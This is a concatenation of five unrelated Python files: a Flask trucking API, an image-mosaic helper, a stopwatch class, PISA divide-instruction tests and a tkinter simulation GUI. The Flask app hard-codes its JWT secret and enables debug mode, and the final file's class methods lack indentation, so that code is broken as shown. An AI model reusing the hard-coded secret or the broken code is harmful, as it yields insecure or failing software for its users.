app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False  # silence the modification-tracking overhead warning
app.config['JWT_SECRET_KEY'] = 'hellotruck'  # NOTE(review): hard-coded secret; move to an env var before production
app.config['JWT_BLACKLIST_ENABLED'] = True  # enable revoked-token checking (see verifica_blacklist below)
api = Api(app)
jwt = JWTManager(app)


@app.before_first_request
def cria_banco():
    # Create all database tables on the first request.
    # NOTE(review): `banco` is only imported in the __main__ block at the bottom
    # of this file, so this callback relies on the module being run as a script
    # — confirm for other entry points (e.g. WSGI servers).
    banco.create_all()


@jwt.token_in_blacklist_loader
def verifica_blacklist(token):
    # A token is considered revoked when its unique id (jti) is in BLACKLIST.
    return token['jti'] in BLACKLIST


@jwt.revoked_token_loader
def token_de_acesso_invalidado():
    # Response returned whenever a revoked (blacklisted) token is presented.
    return jsonify({"message":"You have been logged out!"}), 401 # unauthorized
# --- Route table -------------------------------------------------------------
# Driver (motorista) queries and CRUD
api.add_resource(MotoristasLocalCarga, '/motoristas/local_carga/motoristas_sem_carga')
api.add_resource(CaminhoneirosVeiculoProprio, '/motoristas/motoristas_com_veiculo_proprio')
api.add_resource(CaminhoneirosOrigemDestino, '/motoristas/local_carga/veiculo/origem_destino')
api.add_resource(CaminhoneiroAvaliacao, '/motoristas/top_motoristas')
api.add_resource(CaminhoneirosDisponiveis, '/motoristas/status_veiculo/motoristas_disponiveis')
api.add_resource(Motoristas, '/motoristas')
api.add_resource(Motorista, '/motorista/<int:motorista_id>')
# Users and authentication
api.add_resource(Users, '/usuarios')
api.add_resource(User, '/usuarios/<int:user_id>')
api.add_resource(UserRegister, '/cadastro')
api.add_resource(UserLogin, '/login')
api.add_resource(UserLogout, '/logout')
# Vehicles, vehicle types and vehicle status
api.add_resource(TipoVeiculos, '/tipo_veiculos')
api.add_resource(TipoVeiculo, '/tipo_veiculo/<int:tipo_veiculo_id>')
api.add_resource(Veiculos, '/veiculos')
api.add_resource(Veiculo, '/veiculo/<int:veiculo_id>')
api.add_resource(Status, '/status')
api.add_resource(StatusVeiculo, '/status_veiculo/<int:status_id>')
# Cargo, cargo locations and transports
api.add_resource(Cargas, '/cargas')
api.add_resource(Carga, '/carga/<int:carga_id>')
api.add_resource(LocalCargas, '/local_cargas')
api.add_resource(LocalCarga, '/local_carga/<int:local_carga_id>')
api.add_resource(Transportes, '/transportes')
api.add_resource(Transporte, '/transporte/<int:transporte_id>')
if __name__ == '__main__':
    # Bind the SQLAlchemy instance to the app and start the dev server.
    # TODO: debug=True only while in development.
    from sql_alchemy import banco
    banco.init_app(app)
    app.run(debug=True)
|
#-*- coding: utf-8 -*-
from pathlib import Path
from PIL import Image
import json
import statistics
import os
import sys
class Gatherer():
    """Prepares image assets for a photo-mosaic style pipeline.

    Responsibilities:
      * initFolder()          -- create the ../Images/<name>/ folder layout,
                                 convert JPG originals to PNG and center-crop
                                 them into segmentSize x segmentSize tiles.
      * smallColorDetector()  -- write a JSON file with the average RGB of
                                 every resized tile.
      * modelColorDetector()  -- write a JSON file with the average RGB of
                                 every pixelSize x pixelSize cell of the
                                 "model" (target) image.
    """

    def __init__(self, name, model, segmentSize, pixelSize):
        self.name = name                # sub-folder (collection) name under ../Images/
        self.segmentSize = segmentSize  # side length (px) of the square tiles
        self.pixelSize = pixelSize      # side length (px) of each sampled model cell
        self.imageFolder = "../Images/"
        self.folder = "../Images/" + name + "/"
        self.model = model              # base name (without extension) of the model image

    def initFolder(self):
        """Create the folder layout and normalize the original images
        (JPG -> PNG, then center-crop/resize to segmentSize squares)."""
        # create the images root folder if it doesn't exist
        imagesPath = Path(self.imageFolder)
        if not imagesPath.exists():
            # BUG FIX: this branch previously referenced `originalPath`, which
            # is not defined until further down, so a fresh run raised NameError.
            print("Creating " + str(imagesPath) + "...")
            imagesPath.mkdir()
        # create the per-collection folder if it doesn't exist
        imagesNamePath = Path(self.folder)
        if not imagesNamePath.exists():
            print("Creating " + str(imagesNamePath) + "...")
            imagesNamePath.mkdir()
        # create Originals folder if it doesn't exist
        originalPath = Path(self.folder + "/Originals/")
        if not originalPath.exists():
            print("Creating " + str(originalPath) + "...")
            originalPath.mkdir()
        # create Resized folder if it doesn't exist
        resizedPath = Path(self.folder + "/Resized/")
        if not resizedPath.exists():
            print("Creating " + str(resizedPath) + "...")
            resizedPath.mkdir()
        # abort when there is nothing to process
        if not list(originalPath.glob('*')):
            sys.exit("The directory " + str(self.name) + " is empty or has just been created. Please fill it with pictures.")
        # convert every JPG original to PNG (the JPG is deleted afterwards)
        jpgList = list(originalPath.glob('*.jpg'))
        if jpgList != []:
            for jpg in jpgList:
                self.convertJpgPng(jpg, originalPath)
        # center-crop/resize all PNGs to segmentSize x segmentSize
        pngList = list(originalPath.glob('*.png'))
        widthSize = heightSize = self.segmentSize
        for png in pngList:
            image = Image.open(png)
            # NOTE(review): with `and`, an image that already matches the target
            # size in only ONE dimension is skipped entirely (never written to
            # Resized/) — confirm whether `or` was intended.
            if image.size[0] != widthSize and image.size[1] != heightSize:
                print("cropping " + png.stem + " to " + str(self.segmentSize) + " px...")
                resizedImage = self.cropImage(image, widthSize, heightSize)
                # the image now has a resolution of segmentSize x segmentSize px
                resizedImage.save(str(resizedPath) + "/" + png.stem + ".png")

    def convertJpgPng(self, jpg, path):
        """Save `jpg` (a Path) as a PNG inside `path`, then delete the JPG."""
        image = Image.open(str(jpg))
        print("saving " + jpg.stem + ".png !")
        image.save(str(path) + "/" + jpg.stem + ".png")
        print("deleting " + jpg.stem + ".jpg !")
        os.remove(jpg)

    def cropImage(self, image, widthSize, heightSize):
        """Scale `image` so its shorter side matches the target size, then
        center-crop the longer side, yielding a widthSize x heightSize image."""
        resizedImage = None
        # Image.LANCZOS is the filter formerly exposed as Image.ANTIALIAS;
        # ANTIALIAS was removed in Pillow 10, LANCZOS is the drop-in equivalent.
        if (image.size[0] > image.size[1]):
            # landscape: fit the height, crop the width around the center
            heightPercent = heightSize/image.size[1]
            widthSize = int(heightPercent*image.size[0])
            resizedImage = image.resize((widthSize,heightSize), Image.LANCZOS)
            left = (resizedImage.size[0] - heightSize)/2
            top = 0
            right = (resizedImage.size[0] - heightSize)/2 + heightSize
            bottom = resizedImage.size[1]
            resizedImage = resizedImage.crop((left, top, right, bottom))
        else:
            # portrait (or square): fit the width, crop the height around the center
            widthPercent = widthSize/image.size[0]
            heightSize = int(widthPercent*image.size[1])
            resizedImage = image.resize((widthSize,heightSize), Image.LANCZOS)
            left = 0
            top = (resizedImage.size[1] - widthSize)/2
            right = resizedImage.size[0]
            bottom = (resizedImage.size[1] - widthSize)/2 + widthSize
            resizedImage = resizedImage.crop((left, top, right, bottom))
        return resizedImage

    def colorDetector(self, rgb_im, jsonImage, scale, size = None, x = 0, y = 0):
        """Average the RGB channels over a size x size window of rgb_im
        starting at (x, y), sampling every `scale` pixels, and store the
        result in jsonImage["RGB"] as three stringified ints [R, G, B].

        Returns jsonImage, e.g. {'RGB': ['255', '0', '0']}.
        """
        if size is None:
            size = rgb_im.size[0]
        red = []
        green = []
        blue = []
        jsonImage["RGB"] = []
        for raw in range(y, y + size, scale):
            for column in range(x, x + size, scale):
                rgbValues = rgb_im.getpixel((column, raw))
                # BUG FIX: channels 1 and 2 were previously appended to the
                # wrong lists (green <-> blue swapped), so the emitted "RGB"
                # triple was actually R, B, G.
                red.append(rgbValues[0])
                green.append(rgbValues[1])
                blue.append(rgbValues[2])
        jsonImage["RGB"].append(str(int(statistics.mean(red))))
        jsonImage["RGB"].append(str(int(statistics.mean(green))))
        jsonImage["RGB"].append(str(int(statistics.mean(blue))))
        return jsonImage # type of JSON : {'RGB': ['255', '0', '0']}

    def resizeMiddle(self, rgb_image, pixelSize):
        """Center-crop `rgb_image` so both dimensions become exact multiples
        of pixelSize; the excess is split between the two opposite edges."""
        deltaWidth = rgb_image.size[0] % pixelSize
        deltaHeight = rgb_image.size[1] % pixelSize
        # resize image to fit pixelSize x pixelSize cutting
        if deltaWidth % 2:
            # odd excess: the extra pixel comes off the left edge
            rgb_image = rgb_image.crop((int(deltaWidth/2) + 1, 0, rgb_image.size[0] - int(deltaWidth/2), rgb_image.size[1]))
            print("new:", rgb_image.size[0])
        else:
            rgb_image = rgb_image.crop((deltaWidth/2, 0, rgb_image.size[0] - deltaWidth/2, rgb_image.size[1]))
        if deltaHeight % 2:
            # odd excess: the extra pixel comes off the top edge
            rgb_image = rgb_image.crop((0, int(deltaHeight/2) + 1, rgb_image.size[0], rgb_image.size[1] - int(deltaHeight/2)))
        else:
            rgb_image = rgb_image.crop((0, deltaHeight/2, rgb_image.size[0], rgb_image.size[1] - deltaHeight/2))
        return rgb_image

    def smallColorDetector(self):
        """Compute the average color of every resized tile and dump the list
        to ../Images/imagesInfo/<name>.json."""
        imagesPath = Path(self.folder + "/Resized/")
        ImagesInfoPath = Path(self.imageFolder + "/imagesInfo/")
        if not ImagesInfoPath.exists():
            print("Creating " + str(ImagesInfoPath) + "...")
            ImagesInfoPath.mkdir()
        imagesList = list(imagesPath.glob('*.png'))
        imagesInfoJson = json.loads('[]') # global JSON
        for image in imagesList:
            im = Image.open(image)
            rgb_im = im.convert('RGB')
            imageInfoJson = json.loads('{}') # focus JSON
            # NOTE(review): the per-image dict is stored as its str()
            # representation (not nested JSON) — downstream readers must parse
            # that string; confirm this is intentional.
            imageInfoJson[str(image.stem) + ".png"] = str(self.colorDetector(rgb_im, json.loads('{}'), 5))
            imagesInfoJson.append(imageInfoJson)
        # JSON at this point : [{'image1': {'RGB': ['255', '0', '0']}},
        #                       {'image2': {'RGB': ['0', '255', '0']}}]
        # storage of json in ImagesInfo json file
        with open(str(ImagesInfoPath) + "/" + str(self.name) + ".json", "w") as outfile:
            json.dump(imagesInfoJson, outfile)

    def modelColorDetector(self):
        """Sample the model image cell by cell (pixelSize squares) and dump a
        row-by-row list of average colors to ../Images/imagesInfo/<model>.json."""
        modelPath = Path(self.imageFolder + "/models/")
        ImagesInfoPath = Path(self.imageFolder + "/imagesInfo/")
        if not ImagesInfoPath.exists():
            print("Creating " + str(ImagesInfoPath) + "...")
            ImagesInfoPath.mkdir()
        if not modelPath.exists():
            print("Creating " + str(modelPath) + "...")
            modelPath.mkdir()
        # accept a JPG model by converting it to PNG first
        modelJpgPath = Path(str(modelPath) + "/" + self.model + '.jpg')
        if modelJpgPath.is_file():
            self.convertJpgPng(modelJpgPath, modelPath)
        modelImagePath = Path(str(modelPath) + "/" + self.model + ".png")
        print(modelJpgPath)
        if not modelImagePath.is_file():
            print(modelImagePath)
            sys.exit("The model image does not exist, exiting...")
        pixelSize = self.pixelSize
        image = Image.open(modelImagePath)
        # crop so the image splits evenly into pixelSize cells
        rgb_image = self.resizeMiddle(image.convert('RGB'), pixelSize)
        jsonImages = json.loads('[]') # global JSON
        rawNbr = 1
        for raw in range(0, rgb_image.size[1], pixelSize):
            jsonRaw = json.loads('{}')
            jsonRaw["raw" + str(rawNbr)] = []
            for column in range(0, rgb_image.size[0], pixelSize):
                jsonRaw["raw" + str(rawNbr)].append(self.colorDetector(rgb_image, json.loads('{}'), 2, pixelSize, column, raw))
            rawNbr+=1
            jsonImages.append(jsonRaw) # append each row to the global JSON
        with open(str(ImagesInfoPath) + "/" + self.model + ".json", "w") as outfile:
            json.dump(jsonImages, outfile)
|
'''
Created on Jul 4, 2019
Edited 8/30/19
mildly edited 11/1/19 and 11/12/19
@author: Jacob H.
stopwatch.py
'''
import time
import math
# add a change_precision?
class Stopwatch:
    """A count-up stopwatch reporting elapsed time truncated to a fixed
    number of decimal places.

    Timing is based on time.perf_counter(). An `offset` lets the watch begin
    at a nonzero value; a negative offset behaves like a countdown (-3, -2,
    -1, 0, ...). The default precision is one decimal place and the default
    state is paused.
    """

    def __init__(self, precision: int = 1, offset: float = 0.0, on: bool = False):
        # digits kept after the decimal point when reporting (expected 0..3)
        self._precision = precision
        # whether the watch is currently counting
        self._on = on
        # perf_counter() reading taken when the watch (re)started
        self._start = time.perf_counter() if on else 0.0
        # elapsed time while running; refreshed by update()
        self._time = offset
        # value the watch counts from after the last start/reset/split
        self._offset = offset

    def split(self, offset: float):
        """Restart timing from `offset` without pausing; return the time
        shown at the moment of the split. (Overridden in a child class.)"""
        elapsed = self.get_time()
        self._start = time.perf_counter()
        self._offset = offset
        return elapsed

    def pause(self):
        """Stop counting; remember the elapsed value so start() resumes from it."""
        Stopwatch.update(self)
        self._on = False
        self._offset = self._time

    def start(self):
        """Begin (or resume) counting; a no-op when already running."""
        if self._on:
            return
        self._start = time.perf_counter()
        self._on = True

    def reset(self, offset: float = 0.0):
        """Stop the watch and rewind it to `offset`."""
        self._time = offset
        self._offset = offset
        self._on = False

    def update(self):
        """Refresh the cached elapsed time; does nothing while paused."""
        if not self._on:
            return
        self._time = time.perf_counter() - self._start + self._offset

    def get_time(self):
        """Return the elapsed time truncated (never rounded up) to
        self._precision decimals; returned as int when precision is 0."""
        Stopwatch.update(self)
        factor = 10 ** self._precision
        truncated = math.floor(self._time * factor) / factor
        if self._precision > 0:
            return truncated
        return int(truncated)

    def get_precision(self):
        return self._precision

    def set_precision(self, p):
        self._precision = p

    def is_on(self):
        return self._on
# testing/debug shenanigans
if __name__ == '__main__':
    # Interactive smoke test: busy-waits against wall-clock time, so the
    # expected values in trailing comments are approximate and the run takes
    # several seconds. Left byte-for-byte as the intended manual harness.
    input('Enter/Return:\n')
    print('test start and update')
    timer5 = Stopwatch(2, on = True)  # long-running watch checked at the very end
    timer = Stopwatch()
    timer.start()
    while timer.get_time() < 0.1:
        pass
    print(f'1: {timer.get_time()}') # 0.1
    while timer.get_time() < 0.5:
        pass
    print(f'1: {timer.get_time()}') # 0.5
    print('\ntest pause(s)')
    timer.pause()
    timer2 = Stopwatch(on = True)
    while timer2.get_time() < 0.2:
        pass
    # timer is paused, so its reading must not have advanced
    print(f'1: {timer.get_time()}') # 0.5
    print(f'2: {timer2.get_time()}') # 0.2
    timer.start()
    while timer2.get_time() < 0.3:
        pass
    print(f'2: {timer2.get_time()}') # 0.3
    timer.pause()
    print(f'1: {timer.get_time()}') # 0.6
    while timer2.get_time() < 0.6:
        pass
    print(f'1: {timer.get_time()}') # 0.6
    print(f'2: {timer2.get_time()}') # 0.6
    timer.start()
    print('\ntest precision')
    timer3 = Stopwatch(2, on = True)
    while timer3.get_time() < 0.15:
        pass
    print(f'3: {timer3.get_time()}') # 0.15
    print('\ntest reset')
    timer2.reset()
    timer2.start()
    while timer2.get_time() < 0.2:
        pass
    print(f'1: {timer.get_time()}') # > 0.6, probs 0.9
    print(f'2: {timer2.get_time()}') # 0.2
    print(f'3: {timer3.get_time()}') # 0.35 or so
    print('\ntest negative offset')
    # countdown-style watch: starts at -2.0 and climbs toward 0
    timer4 = Stopwatch(2, -2.0, True)
    while timer4.get_time() < -1.0:
        pass
    print(f'4: {timer4.get_time()}') # -1.0
    timer4.pause()
    while timer2.get_time() < 1.7: # 0.5 second pause
        pass
    print(f'2: {timer2.get_time()}') # 1.7
    timer4.start()
    while timer4.get_time() < 0:
        pass
    print(f'4: {timer4.get_time()}') # 0.0
    #while timer4.get_time() < 5.55:
    #    pass
    input('\nEnter/Return:\n')
    print(f'actual time-keeping test\n4: {timer5.get_time()}') # ≥ 3.95
|
#=========================================================================
# pisa_divu_test.py
#=========================================================================
import pytest
import random
import pisa_encoding
from pymtl import Bits
from PisaSim import PisaSim
from pisa_inst_test_utils import *
#-------------------------------------------------------------------------
# gen_basic_test
#-------------------------------------------------------------------------
def gen_basic_test():
  """Single divu surrounded by generous nop padding (no hazards): 20/4 -> 5.

  The `< n` / `> n` annotations are values injected from / checked by the
  test manager via mfc0/mtc0.
  """
  return """
    mfc0 r1, mngr2proc < 20
    mfc0 r2, mngr2proc < 4
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    divu r3, r1, r2
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    mtc0 r3, proc2mngr > 5
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
  """
#-------------------------------------------------------------------------
# gen_dest_byp_test
#-------------------------------------------------------------------------
def gen_dest_byp_test():
  """Destination-bypass tests: nop counts descend 5..0 while the dividend
  grows as 2,4,...,12 with divisor 2, so results are 1..6."""
  return [ gen_rr_dest_byp_test( 5 - i, "divu", 2 * (i + 1), 2, i + 1 )
           for i in range(6) ]
#-------------------------------------------------------------------------
# gen_src0_byp_test
#-------------------------------------------------------------------------
def gen_src0_byp_test():
  """Source-0 bypass tests: nop counts descend 5,4,3,2,1,0 with dividends
  14,16,...,24, divisor 2, results 7..12.

  BUG FIX: the fifth entry previously repeated 2 nops, so the 1-nop bypass
  path was never exercised; restored the descending pattern used by every
  sibling generator in this file.
  """
  return [
    gen_rr_src0_byp_test( 5, "divu", 14, 2, 7 ),
    gen_rr_src0_byp_test( 4, "divu", 16, 2, 8 ),
    gen_rr_src0_byp_test( 3, "divu", 18, 2, 9 ),
    gen_rr_src0_byp_test( 2, "divu", 20, 2, 10 ),
    gen_rr_src0_byp_test( 1, "divu", 22, 2, 11 ),
    gen_rr_src0_byp_test( 0, "divu", 24, 2, 12 ),
  ]
#-------------------------------------------------------------------------
# gen_src1_byp_test
#-------------------------------------------------------------------------
def gen_src1_byp_test():
  """Source-1 bypass tests: nop counts descend 5..0 while the dividend grows
  as 26,28,...,36 with divisor 2, so results are 13..18."""
  return [ gen_rr_src1_byp_test( 5 - i, "divu", 26 + 2 * i, 2, 13 + i )
           for i in range(6) ]
#-------------------------------------------------------------------------
# gen_srcs_byp_test
#-------------------------------------------------------------------------
def gen_srcs_byp_test():
  """Both-sources bypass tests: nop counts descend 5..0 while the dividend
  grows as 38,40,...,48 with divisor 2, so results are 19..24."""
  return [ gen_rr_srcs_byp_test( 5 - i, "divu", 38 + 2 * i, 2, 19 + i )
           for i in range(6) ]
#-------------------------------------------------------------------------
# gen_srcs_dest_test
#-------------------------------------------------------------------------
def gen_srcs_dest_test():
  """Register-overlap tests: destination equal to a source register, and the
  two source registers equal to each other (and to the destination)."""
  return [
    gen_rr_src0_eq_dest_test( "divu", 50, 25, 2 ),
    gen_rr_src1_eq_dest_test( "divu", 52, 26, 2 ),
    gen_rr_src0_eq_src1_test( "divu", 2, 1 ),
    gen_rr_srcs_eq_dest_test( "divu", 3, 1 ),
  ]
#-------------------------------------------------------------------------
# gen_value_test
#-------------------------------------------------------------------------
def gen_value_test():
  """Directed value tests: zero/one operands, evenly and non-evenly
  divisible pairs, and operands that must be treated as unsigned."""
  return [
    # Zero and one operands
    gen_rr_value_test( "divu", 0, 1, 0 ),
    gen_rr_value_test( "divu", 1, 1, 1 ),
    # Positive evenly-divisible operands
    gen_rr_value_test( "divu", 546, 42, 13 ),
    gen_rr_value_test( "divu", 63724, 716, 89 ),
    gen_rr_value_test( "divu", 167882820, 20154, 8330 ),
    # Positive not evenly-divisible operands (quotient truncates toward zero)
    gen_rr_value_test( "divu", 50, 546, 0 ),
    gen_rr_value_test( "divu", 546, 50, 10 ),
    gen_rr_value_test( "divu", 63724, 793, 80 ),
    gen_rr_value_test( "divu", 167882820, 20150, 8331 ),
    # Test that operands are treated as unsigned
    gen_rr_value_test( "divu", 0x00000000, 0xffffffff, 0x00000000 ),
    gen_rr_value_test( "divu", 0xffffffff, 0xffffffff, 0x00000001 ),
    gen_rr_value_test( "divu", 0x0a01b044, 0xffffb14a, 0x00000000 ),
    gen_rr_value_test( "divu", 0xdeadbeef, 0x0000beef, 0x00012a90 ),
    gen_rr_value_test( "divu", 0xf5fe4fbc, 0x00004eb6, 0x00032012 ),
    gen_rr_value_test( "divu", 0xf5fe4fbc, 0xffffb14a, 0x00000000 ),
  ]
#-------------------------------------------------------------------------
# gen_random_test
#-------------------------------------------------------------------------
def gen_random_test():
  """Generate 100 random divu tests; the reference quotient is computed with
  Python division on 32-bit Bits values.

  BUG FIX: the divisor is now drawn from [1, 0xffffffff]. It was previously
  randint(0, ...), so a (rare) zero divisor crashed the generator itself
  with ZeroDivisionError instead of producing a test.
  """
  asm_code = []
  for i in xrange(100):
    src0 = Bits( 32, random.randint(0,0xffffffff) )
    src1 = Bits( 32, random.randint(1,0xffffffff) )
    dest = Bits( 32, src0 / src1 )
    asm_code.append( gen_rr_value_test( "divu", src0.uint(), src1.uint(), dest.uint() ) )
  return asm_code
#-------------------------------------------------------------------------
# test_basic
#-------------------------------------------------------------------------
# Run every assembly generator above through the PISA functional simulator.
@pytest.mark.parametrize( "name,test", [
  asm_test( gen_basic_test ),
  asm_test( gen_dest_byp_test ),
  asm_test( gen_src0_byp_test ),
  asm_test( gen_src1_byp_test ),
  asm_test( gen_srcs_byp_test ),
  asm_test( gen_srcs_dest_test ),
  asm_test( gen_value_test ),
  asm_test( gen_random_test ),
])
def test( name, test ):
  # Assemble the generated program and execute it; the mtc0 "> value"
  # annotations inside the assembly act as the assertions.
  sim = PisaSim( trace_en=True )
  sim.load( pisa_encoding.assemble( test() ) )
  sim.run()
|
# coding: utf-8
from environnement import *
from threading import Thread
import tkinter
from tkinter import messagebox, ttk, filedialog
import os
import moviepy.video.io.ImageSequenceClip as Movieclip
# import gc --> gc.collect()
def new_label_frame(master_frame, title: str, weight_rows: list, weight_columns: list):
    """Build a tkinter.LabelFrame titled `title` whose grid rows/columns are
    given the stretch weights listed in weight_rows / weight_columns."""
    box = tkinter.LabelFrame(master_frame,
                             text=title,
                             font=TK_FRAME_FONT)
    for index, row_weight in enumerate(weight_rows):
        box.rowconfigure(index, weight=row_weight)
    for index, column_weight in enumerate(weight_columns):
        box.columnconfigure(index, weight=column_weight)
    return box
def new_top_frame(master_frame, size, caption, title, weight_rows: list, weight_columns: list):
    """Open a Toplevel window with geometry `size` and window caption
    `caption`, configure its grid weights, and place a heading label `title`
    across the whole top row. Returns the new window."""
    window = tkinter.Toplevel(master_frame)
    window.geometry(size)
    window.title(caption)
    for index, row_weight in enumerate(weight_rows):
        window.rowconfigure(index, weight=row_weight)
    for index, column_weight in enumerate(weight_columns):
        window.columnconfigure(index, weight=column_weight)
    header = tkinter.Label(window,
                           text=title,
                           font=TK_TITLE_2_FONT)
    header.grid(column=0, row=0, columnspan=len(weight_columns), sticky="nsew")
    return window
def new_scale_config(master_frame, config, variable):
    """Horizontal Scale widget wired to `variable`, with bounds, step and
    label taken from the DIC_CONFIGURATIONS entry for `config`."""
    params = DIC_CONFIGURATIONS[config]
    return tkinter.Scale(master_frame,
                         orient="horizontal",
                         from_=params[PARAM_MIN_VALUE],
                         to=params[PARAM_MAX_VALUE],
                         resolution=params[PARAM_STEP],
                         font=TK_LABEL_FONT,
                         label=params[PARAM_LABEL],
                         variable=variable)
def new_config_label_frame(master_frame, dic_tkvar: dict, type_frame: int):
    """LabelFrame holding one widget per configuration of `type_frame`: a
    Checkbutton for boolean configs, a Scale otherwise, each bound to its
    tkinter variable from dic_tkvar."""
    frame_params = DIC_LABEL_FRAME_CONFIGURATIONS[type_frame]
    configs = frame_params[PARAM_LISTE_CONFIG]
    frame = new_label_frame(master_frame, frame_params[PARAM_TITRE],
                            [1] * len(configs), [1])
    for row, config in enumerate(configs):
        if DIC_CONFIGURATIONS[config][PARAM_TYPE] == bool:
            widget = tkinter.Checkbutton(frame,
                                         text=DIC_CONFIGURATIONS[config][PARAM_LABEL],
                                         font=TK_LABEL_FONT,
                                         variable=dic_tkvar[config])
            sticky = "nsw"
        else:
            widget = new_scale_config(frame, config, dic_tkvar[config])
            sticky = "nsew"
        widget.grid(row=row, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky=sticky)
    return frame
def new_scale(master_frame, type_scale, variable):
    """Horizontal Scale widget wired to `variable`, with bounds, step and
    label taken from the DIC_SCALE entry for `type_scale`."""
    params = DIC_SCALE[type_scale]
    return tkinter.Scale(master_frame,
                         orient="horizontal",
                         from_=params[PARAM_MIN_VALUE],
                         to=params[PARAM_MAX_VALUE],
                         resolution=params[PARAM_STEP],
                         variable=variable,
                         font=TK_LABEL_FONT,
                         label=params[PARAM_LABEL])
def clear_images_moviepy(nom_dossier: str, nb_images):
    """Delete the numbered frame files 1..nb_images+1 written for moviepy,
    then remove the (now empty) folder itself."""
    frame_paths = (f"{nom_dossier}/{num}{FORMAT_IMAGES}"
                   for num in range(1, nb_images + 2))
    for path in frame_paths:
        if os.path.exists(path):
            os.remove(path)
    os.rmdir(nom_dossier)
class Simulation:
def __init__(self):
    """Create the tkinter application, the tk variables mirroring every
    configuration/characteristic value, and a first environment.

    NOTE(review): the DIC_*/LISTE_*/SCALE_*/PARAM_* tables come from
    `environnement` (star-imported at the top of the file) — confirm their
    semantics there. tkinter.Tk() must be created before any tk Variable.
    """
    self.app = tkinter.Tk()
    self.num_simulation = 0
    self.environnement = None  # set later (presumably by new_environnement) — TODO confirm
    self.list_id_figs_matplotlib = []
    # state flags for the three independent loops/views
    self.running_simu = False
    self.running_pygame = False
    self.running_matplotbil = False
    self.stop_enregistrement = tkinter.BooleanVar(self.app, value=False)
    self.tk_var_stop_init_new_environnement = None
    # current value of every simulation configuration, keyed by config name
    self.tk_valeurs_configurations = {conf: DIC_CONFIGURATIONS[conf][PARAM_DEFAULT_VALUE]
                                      for conf in LISTE_CONFIGS}
    # per-characteristic parameters for individuals (value, bounds, mutation
    # settings, randomness flag), copied from the defaults table
    self.tk_valeurs_caracteres_individus = {caractere: {param: DIC_CARACTERES_INDIVIDU[caractere][param]
                                                        for param in [PARAM_VALUE, PARAM_MIN_VALUE, PARAM_MAX_VALUE,
                                                                      PARAM_PROBA_MUTATION, PARAM_DEGRE_MUTATION,
                                                                      PARAM_ALEATOIRE]}
                                            for caractere in LISTE_CARACTERES_INDIVIDU}
    # speed/FPS controls for the three views
    self.delay_simulation = tkinter.DoubleVar(value=DIC_SCALE[SCALE_SIMULATION_FPS][PARAM_DEFAULT_VALUE])
    self.var_fps_pygame = tkinter.IntVar(value=DIC_SCALE[SCALE_PYGAME_FPS][PARAM_DEFAULT_VALUE])
    self.var_fps_matplotlib = tkinter.IntVar(value=DIC_SCALE[SCALE_MATPLOTLIB_FPS][PARAM_DEFAULT_VALUE])
    # button widgets per frame, filled in by init_tkinter_app()
    self.tk_buttons_simulation = {}
    self.tk_buttons_pygame = {}
    self.tk_buttons_matplotbil = {}
    self.tk_nb_figs_matplotlib = tkinter.IntVar(self.app, 0)
    self.chemin_videos = ""
    self.init_tkinter_app()
    # NOTE(review): new_environnement is defined outside this chunk.
    self.new_environnement({conf: self.tk_valeurs_configurations[conf] for conf in LISTE_CONFIGS_SIMULATION_ONLY},
                           self.tk_valeurs_caracteres_individus)
# Tkinter
def init_tkinter_app(self):
    """Build the main window: a title label, three control frames
    (simulation, pygame view, matplotlib view) and a quit button.

    The three nested helpers each populate one frame and register its
    buttons in the corresponding self.tk_buttons_* dict so other methods
    can toggle their state.
    """
    self.app.geometry(TK_APP_SIZE)
    self.app.title(TK_CAPTION_TEXT)
    self.app.option_add("*TCombobox*Listbox.font", TK_LABEL_FONT)
    # route the window-manager close button through quitter() for confirmation/cleanup
    self.app.protocol("WM_DELETE_WINDOW", self.quitter)
    title = tkinter.Label(self.app,
                          text=TK_TITLE_TEXT,
                          font=TK_TITLE_FONT)
    simulation_frame = new_label_frame(self.app, TK_SIMULATION_TEXT, [1, 1, 1, 1], [1, 1])
    pygame_frame = new_label_frame(self.app, TK_PYGAME_TEXT, [1, 1], [1, 1])
    matplotlib_frame = new_label_frame(self.app, TK_MATPLOTLIB_TEXT, [1, 1, 1], [1, 1])

    def init_tkinter_simulation_frame():
        # start/stop buttons and a speed scale for the simulation loop
        start_button = tkinter.Button(simulation_frame,
                                      text=TK_START_BUTTON_TEXT,
                                      font=TK_BUTTON_FONT,
                                      command=self.start_simulation)
        stop_button = tkinter.Button(simulation_frame,
                                     text=TK_STOP_BUTTON_TEXT,
                                     font=TK_BUTTON_FONT,
                                     command=self.stop_simulation,
                                     state="disabled")
        delay_scale = new_scale(simulation_frame, SCALE_SIMULATION_FPS, self.delay_simulation)
        # --------------------------------------------------------
        # live counters (day number, population, days/minute) bound to
        # class-level tk variables on Stats (defined in environnement)
        info_frame = new_label_frame(simulation_frame, "Informations", [1, 1], [1, 1, 1, 1])
        Stats.tk_jour = tkinter.IntVar()
        Stats.tk_nb_individus = tkinter.IntVar()
        Stats.tk_nb_jours_par_min = tkinter.DoubleVar()
        num_jour_label = tkinter.Label(info_frame,
                                       textvariable=Stats.tk_jour,
                                       width=4,
                                       anchor="w",
                                       font=TK_JOUR_LABEL_FONT)
        jour_label = tkinter.Label(info_frame,
                                   text=TK_JOUR_NUM_LABEL_TEXT,
                                   font=TK_JOUR_LABEL_FONT)
        jour_label.grid(row=0, column=0, rowspan=2, sticky="e")
        num_jour_label.grid(row=0, column=1, rowspan=2, sticky="ew")
        for j, (var, text) in enumerate([(Stats.tk_nb_individus, TK_LABEL_I_NB_INDIVIDUS),
                                         (Stats.tk_nb_jours_par_min, TK_LABEL_I_NB_JOURS_PAR_MIN)]):
            var_label = tkinter.Label(info_frame,
                                      width=4,
                                      anchor="e",
                                      textvariable=var,
                                      font=TK_LABEL_FONT)
            label = tkinter.Label(info_frame,
                                  text=text,
                                  font=TK_LABEL_FONT)
            var_label.grid(row=j, column=2, padx=TK_MARGE_WIDGET, sticky="ew")
            label.grid(row=j, column=3, sticky="w")
        # --------------------------------------------------------
        new_button = tkinter.Button(simulation_frame,
                                    text=TK_NEW_BUTTON_TEXT,
                                    font=TK_BUTTON_FONT,
                                    command=self.new_simulation_frame)
        # config_button = tkinter.Button(simulation_frame,
        #                                text=TK_CONFIG_BUTTON_TEXT,
        #                                font=TK_BUTTON_FONT,
        #                                command=self.configurations_button_action)
